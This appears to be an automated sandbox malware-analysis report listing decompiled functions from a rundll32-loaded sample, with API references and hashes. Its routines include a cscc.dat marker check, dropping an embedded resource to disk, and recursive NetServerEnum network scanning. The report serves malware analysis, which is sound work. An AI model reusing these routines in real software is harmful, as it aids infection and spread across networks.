                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 27%
                                                                                                                                                  			E0477A112(void* __ecx, void* _a4, void* _a7352) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				void _v12;
                                                                                                                                                  				intOrPtr _t10;
                                                                                                                                                  				void* _t16;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				intOrPtr _t27;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  
                                                                                                                                                  				_t21 = _a4;
                                                                                                                                                  				if(_t21 != 0) {
                                                                                                                                                  					_t31 =  *(_t21 + 4);
                                                                                                                                                  					_t27 =  *0x4787b88;
                                                                                                                                                  					_v12 =  *_t21;
                                                                                                                                                  					_v8 =  *0x4787bb8;
                                                                                                                                                  					_t10 =  *0x4787b80;
                                                                                                                                                  					_t37 = _t10;
                                                                                                                                                  					if(_t10 == 0 || E04779F7A(__ecx, _t37, _t31, _t10) == 0) {
                                                                                                                                                  						_t39 = _t27;
                                                                                                                                                  						if(_t27 == 0 || E047798AB(_t39, _t31, _t27) == 0) {
                                                                                                                                                  							if(_v12 != 0) {
                                                                                                                                                  								_t16 = E04779534(_t31, 0, 0, 0); // executed
                                                                                                                                                  								if(_t16 != 0) {
                                                                                                                                                  									goto L7;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L7;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						L7:
                                                                                                                                                  						E04776B5F(_t31, _v8, 0);
                                                                                                                                                  					}
                                                                                                                                                  					HeapFree(GetProcessHeap(), 0, _t31);
                                                                                                                                                  					HeapFree(GetProcessHeap(), 0, _t21);
                                                                                                                                                  				}
                                                                                                                                                  				return 0;
                                                                                                                                                  			}










                                                                                                                                                  0x0477a11c
                                                                                                                                                  0x0477a123
                                                                                                                                                  0x0477a127
                                                                                                                                                  0x0477a12a
                                                                                                                                                  0x0477a130
                                                                                                                                                  0x0477a139
                                                                                                                                                  0x0477a13d
                                                                                                                                                  0x0477a142
                                                                                                                                                  0x0477a144
                                                                                                                                                  0x0477a151
                                                                                                                                                  0x0477a153
                                                                                                                                                  0x0477a166
                                                                                                                                                  0x0477a16c
                                                                                                                                                  0x0477a173
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a173
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a175
                                                                                                                                                  0x0477a175
                                                                                                                                                  0x0477a17d
                                                                                                                                                  0x0477a17d
                                                                                                                                                  0x0477a194
                                                                                                                                                  0x0477a19c
                                                                                                                                                  0x0477a19c
                                                                                                                                                  0x0477a1a6

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0477A18B
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0477A194
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0477A199
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0477A19C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3859560861-0
                                                                                                                                                  • Opcode ID: 36526c6551fff1078e523ee5b3f172034e56f439706bcc5f0b5a7ac82442d2ff
                                                                                                                                                  • Instruction ID: 790a8caf9ed34ab16b4bf5f6c55e84fa6f4c7e1ab15b57c59275ac8be3c99b1d
                                                                                                                                                  • Opcode Fuzzy Hash: 36526c6551fff1078e523ee5b3f172034e56f439706bcc5f0b5a7ac82442d2ff
                                                                                                                                                  • Instruction Fuzzy Hash: 7B1182B26013156BFF10AA69AC44F6B7BADEF857A0F944529FE04D3340E724FD0186B2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                  			E04777E8E(void* __ecx, void* __eflags) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				short _v1572;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				int _t12;
                                                                                                                                                  				signed int _t16;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  				int _t22;
                                                                                                                                                  				void* _t26;
                                                                                                                                                  				int _t27;
                                                                                                                                                  
                                                                                                                                                  				_t26 = __ecx;
                                                                                                                                                  				_t27 = 0;
                                                                                                                                                  				if(E04777E69( &_v1572) == 0) {
                                                                                                                                                  					L4:
                                                                                                                                                  					return _t27;
                                                                                                                                                  				}
                                                                                                                                                  				_t12 = PathFileExistsW( &_v1572); // executed
                                                                                                                                                  				if(_t12 != 0) {
                                                                                                                                                  					ExitProcess(0);
                                                                                                                                                  				}
                                                                                                                                                  				_t16 = E04776F7C(_t26, GetCurrentProcess());
                                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                                  				_t20 = E04778313( ~( ~_t16) + 7,  &_v12,  &_v8); // executed
                                                                                                                                                  				if(_t20 != 0) {
                                                                                                                                                  					_t22 = E047787E7(_v8,  &_v1572, _v12); // executed
                                                                                                                                                  					_t27 = _t22;
                                                                                                                                                  				}
                                                                                                                                                  				goto L4;
                                                                                                                                                  			}













                                                                                                                                                  0x04777e8e
                                                                                                                                                  0x04777e9f
                                                                                                                                                  0x04777ea8
                                                                                                                                                  0x04777ef7
                                                                                                                                                  0x04777efb
                                                                                                                                                  0x04777efb
                                                                                                                                                  0x04777eb1
                                                                                                                                                  0x04777eb9
                                                                                                                                                  0x04777efd
                                                                                                                                                  0x04777efd
                                                                                                                                                  0x04777eca
                                                                                                                                                  0x04777ed1
                                                                                                                                                  0x04777ed8
                                                                                                                                                  0x04777edf
                                                                                                                                                  0x04777eef
                                                                                                                                                  0x04777ef4
                                                                                                                                                  0x04777ef6
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 04777E69: PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,04777EA6,?), ref: 04777E7C
                                                                                                                                                  • PathFileExistsW.KERNELBASE(?,?), ref: 04777EB1
                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?), ref: 04777EC3
                                                                                                                                                    • Part of subcall function 04776F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04777170,00000000,?,04777AF8), ref: 04776F8E
                                                                                                                                                    • Part of subcall function 04776F7C: GetProcAddress.KERNEL32(00000000), ref: 04776F95
                                                                                                                                                    • Part of subcall function 04778313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 0477832A
                                                                                                                                                    • Part of subcall function 04778313: LoadResource.KERNEL32(00000000), ref: 04778341
                                                                                                                                                    • Part of subcall function 04778313: LockResource.KERNEL32(00000000), ref: 04778350
                                                                                                                                                    • Part of subcall function 04778313: SizeofResource.KERNEL32(00000000), ref: 04778368
                                                                                                                                                    • Part of subcall function 04778313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04778384
                                                                                                                                                    • Part of subcall function 04778313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0477838D
                                                                                                                                                    • Part of subcall function 04778313: memcpy.MSVCRT ref: 0477839C
                                                                                                                                                    • Part of subcall function 04778313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 047783B9
                                                                                                                                                    • Part of subcall function 04778313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 047783BC
                                                                                                                                                    • Part of subcall function 04778313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 0477840A
                                                                                                                                                    • Part of subcall function 04778313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 0477840D
                                                                                                                                                    • Part of subcall function 047787E7: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,047711BB,?,?), ref: 047787FC
                                                                                                                                                    • Part of subcall function 047787E7: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,047711BB,?,?), ref: 04778813
                                                                                                                                                    • Part of subcall function 047787E7: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,047711BB,?,?), ref: 04778824
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 04777EFD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$Resource$File$AllocateFindPath$AddressChangeCloseCombineCreateCurrentExistsExitFreeHandleLoadLockModuleNotificationProcSizeofWritememcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 706652641-0
                                                                                                                                                  • Opcode ID: 0e990f940261a2cc648be730891f945041d1c2f036c4729f2e120dbbc6bc2dcb
                                                                                                                                                  • Instruction ID: e87b909c661d4b8b89a3a39efa2e0c785f9a00d35980e91960c900a2248db0cb
                                                                                                                                                  • Opcode Fuzzy Hash: 0e990f940261a2cc648be730891f945041d1c2f036c4729f2e120dbbc6bc2dcb
                                                                                                                                                  • Instruction Fuzzy Hash: 73F0447290061967EF20AFF4DD48DDEB3ADEF08244FC444A1A501D2640E679FE458AA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04776FAF(long __ebx, long _a4, void* _a8) {
                                                                                                                                                  				void* _t6;
                                                                                                                                                  				int _t9;
                                                                                                                                                  				void* _t12;
                                                                                                                                                  				struct _OVERLAPPED* _t13;
                                                                                                                                                  
                                                                                                                                                  				_t13 = 0;
                                                                                                                                                  				_t6 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 2, 0); // executed
                                                                                                                                                  				_t12 = _t6;
                                                                                                                                                  				if(_t12 != 0xffffffff) {
                                                                                                                                                  					_a4 = 0;
                                                                                                                                                  					_t9 = WriteFile(_t12, _a8, __ebx,  &_a4, 0); // executed
                                                                                                                                                  					if(_t9 != 0 && __ebx == _a4) {
                                                                                                                                                  						_t13 = 1;
                                                                                                                                                  					}
                                                                                                                                                  					CloseHandle(_t12);
                                                                                                                                                  				}
                                                                                                                                                  				return _t13;
                                                                                                                                                  			}







                                                                                                                                                  0x04776fb4
                                                                                                                                                  0x04776fc5
                                                                                                                                                  0x04776fcb
                                                                                                                                                  0x04776fd0
                                                                                                                                                  0x04776fdb
                                                                                                                                                  0x04776fdf
                                                                                                                                                  0x04776fe7
                                                                                                                                                  0x04776fee
                                                                                                                                                  0x04776fee
                                                                                                                                                  0x04776ff0
                                                                                                                                                  0x04776ff0
                                                                                                                                                  0x04776ffb

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,04777201,?,?,?,04777AF8), ref: 04776FC5
                                                                                                                                                  • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,04777201,?,?,?,04777AF8), ref: 04776FDF
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,04777201,?,?,?,04777AF8), ref: 04776FF0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CloseCreateHandleWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1065093856-0
                                                                                                                                                  • Opcode ID: 24ccfe71e81283744df80bf8951416daeb24e13c633ead36d9cfce93b21df0b3
                                                                                                                                                  • Instruction ID: 6a86713721030037b73264092a422cb6235a761b7f7021cfb2104bef735f34cc
                                                                                                                                                  • Opcode Fuzzy Hash: 24ccfe71e81283744df80bf8951416daeb24e13c633ead36d9cfce93b21df0b3
                                                                                                                                                  • Instruction Fuzzy Hash: FEF0FE312011247ADB305E66EC4CEEB7F6CEF457F1F908112FE0996190D631E942D6E0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E047787E7(long __ebx, long _a4, void* _a8) {
                                                                                                                                                  				void* _t5;
                                                                                                                                                  				int _t8;
                                                                                                                                                  				void* _t11;
                                                                                                                                                  				struct _OVERLAPPED* _t12;
                                                                                                                                                  
                                                                                                                                                  				_t12 = 0;
                                                                                                                                                  				_t5 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                  				_t11 = _t5;
                                                                                                                                                  				if(_t11 != 0xffffffff) {
                                                                                                                                                  					_t8 = WriteFile(_t11, _a8, __ebx,  &_a4, 0); // executed
                                                                                                                                                  					if(_t8 != 0 && _a4 == __ebx) {
                                                                                                                                                  						_t12 = 1;
                                                                                                                                                  					}
                                                                                                                                                  					FindCloseChangeNotification(_t11); // executed
                                                                                                                                                  				}
                                                                                                                                                  				return _t12;
                                                                                                                                                  			}







                                                                                                                                                  0x047787ec
                                                                                                                                                  0x047787fc
                                                                                                                                                  0x04778802
                                                                                                                                                  0x04778807
                                                                                                                                                  0x04778813
                                                                                                                                                  0x0477881b
                                                                                                                                                  0x04778822
                                                                                                                                                  0x04778822
                                                                                                                                                  0x04778824
                                                                                                                                                  0x04778824
                                                                                                                                                  0x0477882f

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,047711BB,?,?), ref: 047787FC
                                                                                                                                                  • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,047711BB,?,?), ref: 04778813
                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,047711BB,?,?), ref: 04778824
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3805958096-0
                                                                                                                                                  • Opcode ID: 02032bd3e86dd9714adcc58ff28116f7db14d0b77d4e8ac13fe07def3a3c515d
                                                                                                                                                  • Instruction ID: b3b7abeae5aa1f2820b989b63d0316c20fb950af80481896f217648bd779583f
                                                                                                                                                  • Opcode Fuzzy Hash: 02032bd3e86dd9714adcc58ff28116f7db14d0b77d4e8ac13fe07def3a3c515d
                                                                                                                                                  • Instruction Fuzzy Hash: D9F01C32201024BADB302E66EC4CEEB7F6CEF866F1B418125FA0985160E634D942D6E1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04776D35(signed int* __ebx, struct _CRITICAL_SECTION* __esi, intOrPtr* _a4) {
                                                                                                                                                  				void* _t13;
                                                                                                                                                  				intOrPtr _t15;
                                                                                                                                                  				signed int* _t16;
                                                                                                                                                  				signed int _t17;
                                                                                                                                                  				signed int _t20;
                                                                                                                                                  				intOrPtr* _t21;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				struct _CRITICAL_SECTION* _t26;
                                                                                                                                                  
                                                                                                                                                  				_t26 = __esi;
                                                                                                                                                  				_t16 = __ebx;
                                                                                                                                                  				if(__ebx == 0 || __esi == 0) {
                                                                                                                                                  					return 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_t23 = 0;
                                                                                                                                                  						EnterCriticalSection(_t26);
                                                                                                                                                  						do {
                                                                                                                                                  							_t17 =  *_t16;
                                                                                                                                                  							if(_t17 >=  *((intOrPtr*)(_t26 + 0x24))) {
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							_t15 =  *((intOrPtr*)( *((intOrPtr*)(_t26 + 0x18)) + _t17 * 4));
                                                                                                                                                  							_t20 =  *(_t15 + 4);
                                                                                                                                                  							if(_t20 == 0 || (_t16[1] & _t20) != 0) {
                                                                                                                                                  								_t21 = _a4;
                                                                                                                                                  								_t23 = 1;
                                                                                                                                                  								if(_t21 != 0) {
                                                                                                                                                  									 *_t21 = _t15;
                                                                                                                                                  								}
                                                                                                                                                  							} else {
                                                                                                                                                  								_t23 = 0;
                                                                                                                                                  							}
                                                                                                                                                  							 *_t16 = _t17 + 1;
                                                                                                                                                  						} while (_t23 == 0);
                                                                                                                                                  						LeaveCriticalSection(_t26);
                                                                                                                                                  						_t13 = _t23;
                                                                                                                                                  						if(_t23 != 0 ||  *((intOrPtr*)(_t26 + 0x28)) != 0) {
                                                                                                                                                  							return _t13;
                                                                                                                                                  						} else {
                                                                                                                                                  							Sleep(0x2710); // executed
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}











                                                                                                                                                  0x04776d35
                                                                                                                                                  0x04776d35
                                                                                                                                                  0x04776d3c
                                                                                                                                                  0x04776da1
                                                                                                                                                  0x04776d42
                                                                                                                                                  0x04776d43
                                                                                                                                                  0x04776d44
                                                                                                                                                  0x04776d46
                                                                                                                                                  0x04776d4c
                                                                                                                                                  0x04776d4c
                                                                                                                                                  0x04776d53
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776d58
                                                                                                                                                  0x04776d5b
                                                                                                                                                  0x04776d60
                                                                                                                                                  0x04776d6b
                                                                                                                                                  0x04776d70
                                                                                                                                                  0x04776d73
                                                                                                                                                  0x04776d75
                                                                                                                                                  0x04776d75
                                                                                                                                                  0x04776d67
                                                                                                                                                  0x04776d67
                                                                                                                                                  0x04776d67
                                                                                                                                                  0x04776d78
                                                                                                                                                  0x04776d7a
                                                                                                                                                  0x04776d7f
                                                                                                                                                  0x04776d85
                                                                                                                                                  0x04776d89
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776d92
                                                                                                                                                  0x04776d97
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776d97
                                                                                                                                                  0x04776d89
                                                                                                                                                  0x04776d43

                                                                                                                                                  APIs
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,74CB4F20,?,04776D1C,?,?,?,04776B24,00000000,00000000,?,?,?,0477A35C,?), ref: 04776D46
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,04776D1C,?,?,?,04776B24,00000000,00000000,?,?,?,0477A35C,?), ref: 04776D7F
                                                                                                                                                  • Sleep.KERNELBASE(00002710,?,04776D1C,?,?,?,04776B24,00000000,00000000,?,?,?,0477A35C,?), ref: 04776D97
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeaveSleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1566154052-0
                                                                                                                                                  • Opcode ID: fd117a00065caa0f4edd389c3147b1f69e0cc2d65f2841dfbe4d692c7f83039a
                                                                                                                                                  • Instruction ID: ff6943fbd9b0b44552622bd3135a574e10b410f515179209515a71fbb2a63c5d
                                                                                                                                                  • Opcode Fuzzy Hash: fd117a00065caa0f4edd389c3147b1f69e0cc2d65f2841dfbe4d692c7f83039a
                                                                                                                                                  • Instruction Fuzzy Hash: 92017C35220E018B9F259E1AC494E3777B6EFC57A4389C528E90A8B30CEB30F8428A50
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0477A333(void* __eflags, void* _a4) {
                                                                                                                                                  				short _v36;
                                                                                                                                                  				void* _t13;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				void* _t32;
                                                                                                                                                  
                                                                                                                                                  				_t32 = __eflags;
                                                                                                                                                  				_t24 = _a4;
                                                                                                                                                  				Sleep( *_t24); // executed
                                                                                                                                                  				_t27 =  *0x4787bb8;
                                                                                                                                                  				_t22 =  *0x4787bb8;
                                                                                                                                                  				_t20 = E04776B0E(_t27, _t32,  &_v36);
                                                                                                                                                  				if(_t8 != 0) {
                                                                                                                                                  					do {
                                                                                                                                                  						_t13 = E04779F27( &_v36); // executed
                                                                                                                                                  						if(_t13 != 0) {
                                                                                                                                                  							_t22 =  &_v36;
                                                                                                                                                  							E04776B5F( &_v36, _t27, _t20);
                                                                                                                                                  						}
                                                                                                                                                  						_v36 = 0;
                                                                                                                                                  					} while (E04776AD0(_t22,  &_v36) != 0);
                                                                                                                                                  					E04776B46(_t20);
                                                                                                                                                  				}
                                                                                                                                                  				HeapFree(GetProcessHeap(), 0, _t24);
                                                                                                                                                  				return 0;
                                                                                                                                                  			}







                                                                                                                                                  0x0477a333
                                                                                                                                                  0x0477a33f
                                                                                                                                                  0x0477a344
                                                                                                                                                  0x0477a34a
                                                                                                                                                  0x0477a355
                                                                                                                                                  0x0477a35c
                                                                                                                                                  0x0477a360
                                                                                                                                                  0x0477a362
                                                                                                                                                  0x0477a367
                                                                                                                                                  0x0477a36e
                                                                                                                                                  0x0477a372
                                                                                                                                                  0x0477a376
                                                                                                                                                  0x0477a376
                                                                                                                                                  0x0477a37d
                                                                                                                                                  0x0477a38c
                                                                                                                                                  0x0477a391
                                                                                                                                                  0x0477a391
                                                                                                                                                  0x0477a3a0
                                                                                                                                                  0x0477a3ae

                                                                                                                                                  APIs
                                                                                                                                                  • Sleep.KERNELBASE(?), ref: 0477A344
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0477A399
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0477A3A0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$FreeProcessSleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1803097132-0
                                                                                                                                                  • Opcode ID: 39df4667282f9932d2fde1a8a6a6bad29e1c041c2a65b2b3bbf1d8726afbba9e
                                                                                                                                                  • Instruction ID: 88e1284b9fa02e07095ca62267d5bb9d47c0a314c85850099591592a01825342
                                                                                                                                                  • Opcode Fuzzy Hash: 39df4667282f9932d2fde1a8a6a6bad29e1c041c2a65b2b3bbf1d8726afbba9e
                                                                                                                                                  • Instruction Fuzzy Hash: 6C01A77220470657EB10EEB59C88DABB79CEF85314F540929BA01C2254EB24F915C7A1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                  			E0477751B(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				void* _v20;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void** _t30;
                                                                                                                                                  				void* _t40;
                                                                                                                                                  				void* _t42;
                                                                                                                                                  				intOrPtr* _t43;
                                                                                                                                                  				void* _t44;
                                                                                                                                                  
                                                                                                                                                  				_t44 = 0;
                                                                                                                                                  				_t30 =  &_v8;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				__imp__NetServerEnum(0, 0x65, _t30, 0xffffffff,  &_v12,  &_v20, _a8, _a12,  &_v16); // executed
                                                                                                                                                  				if(_t30 == 0 || _t30 == 0xea) {
                                                                                                                                                  					_t42 = _v8;
                                                                                                                                                  					_a12 = 1;
                                                                                                                                                  					if(_t42 == _t44) {
                                                                                                                                                  						goto L16;
                                                                                                                                                  					}
                                                                                                                                                  					_t40 = 0;
                                                                                                                                                  					if(_v12 <= _t44) {
                                                                                                                                                  						L13:
                                                                                                                                                  						goto L14;
                                                                                                                                                  					}
                                                                                                                                                  					_t43 = _t42 + 4;
                                                                                                                                                  					while(_t43 != 4) {
                                                                                                                                                  						if(( *(_t43 + 0xc) & 0x80000000) == 0) {
                                                                                                                                                  							if( *((intOrPtr*)(_t43 - 4)) == 0x1f4 && ( *(_t43 + 4) & 0x0000000f) > 4) {
                                                                                                                                                  								_t44 = 0;
                                                                                                                                                  								E04776B95( *_t43, 0, _a4);
                                                                                                                                                  							}
                                                                                                                                                  						} else {
                                                                                                                                                  							E0477751B(_a4, 3,  *_t43);
                                                                                                                                                  						}
                                                                                                                                                  						_t43 = _t43 + 0x18;
                                                                                                                                                  						_t40 = _t40 + 1;
                                                                                                                                                  						if(_t40 < _v12) {
                                                                                                                                                  							continue;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L13;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					goto L13;
                                                                                                                                                  				} else {
                                                                                                                                                  					_a12 = 0;
                                                                                                                                                  					L14:
                                                                                                                                                  					if(_v8 != _t44) {
                                                                                                                                                  						NetApiBufferFree(_v8);
                                                                                                                                                  					}
                                                                                                                                                  					L16:
                                                                                                                                                  					return _a12;
                                                                                                                                                  				}
                                                                                                                                                  			}













                                                                                                                                                  0x04777530
                                                                                                                                                  0x04777539
                                                                                                                                                  0x04777540
                                                                                                                                                  0x04777543
                                                                                                                                                  0x04777546
                                                                                                                                                  0x04777549
                                                                                                                                                  0x0477754c
                                                                                                                                                  0x04777554
                                                                                                                                                  0x04777562
                                                                                                                                                  0x04777565
                                                                                                                                                  0x0477756e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04777571
                                                                                                                                                  0x04777576
